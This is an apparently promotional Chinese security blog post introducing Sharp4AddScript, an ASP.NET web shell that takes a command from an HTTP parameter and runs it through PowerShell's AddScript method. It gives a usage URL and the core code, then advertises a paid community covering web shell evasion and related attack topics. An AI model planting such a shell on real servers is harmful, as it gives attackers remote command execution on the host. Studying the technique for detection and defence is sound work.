01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他方面

02基本介绍

Sharp4AddScript是一款WebShell管理工具，通过接受HTTP请求中的参数来执行命令。该工具利用了PowerShell底层强大的功能，通过AddScript方法执行命令，能够在不依赖powershell.exe的环境中运行复杂的脚本。

03使用方法

Sharp4AddScript的使用非常简单。只需通过HTTP请求发送包含要执行命令的参数即可。示例如下：

/Sharp4AddScript?con=winver

在上述示例中，工具将执行winver命令，显示Windows版本信息。

04实现代码

下面是Sharp4AddScript工具的实现代码。它是一个简单的.NET页面，包含必要的引用和命名空间导入，以及处理请求和执行命令的核心逻辑。首先是引入System.Management.Automation命名空间提供了PowerShell相关的类，Runspaces命名空间包含运行空间的相关类，用于执行PowerShell脚本，具体代码如下所示。

<%@ Import Namespace="System.Management.Automation" %>
<%@ Import Namespace="System.Management.Automation.Runspaces" %>

接着使用PowerShell.Create()创建一个PowerShell对象，调用AddScript方法添加要执行的脚本，具体如下所示。

using (PowerShell PowerShellInstance = PowerShell.Create())
{PowerShellInstance.AddScript(command);PowerShellInstance.Invoke();
}

提交参数con=winver.exe，运行后可见IIS进程已经启动了winver。如下图所示。

工具已经打包在星球，感兴趣的朋友可以加入自取。

 05.NET安全星球

星球汇聚了各行业安全攻防技术大咖，并且每日分享.NET安全技术干货以及交流解答各类技术等问题，社区中发布很多高质量的.NET安全资源，可以说市面上很少见，都是干货。

20+个专题栏目涵盖了点、线、面、体等知识面，助力师傅们快速成长！其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

我们倾力打造专刊、视频等配套学习资源，循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。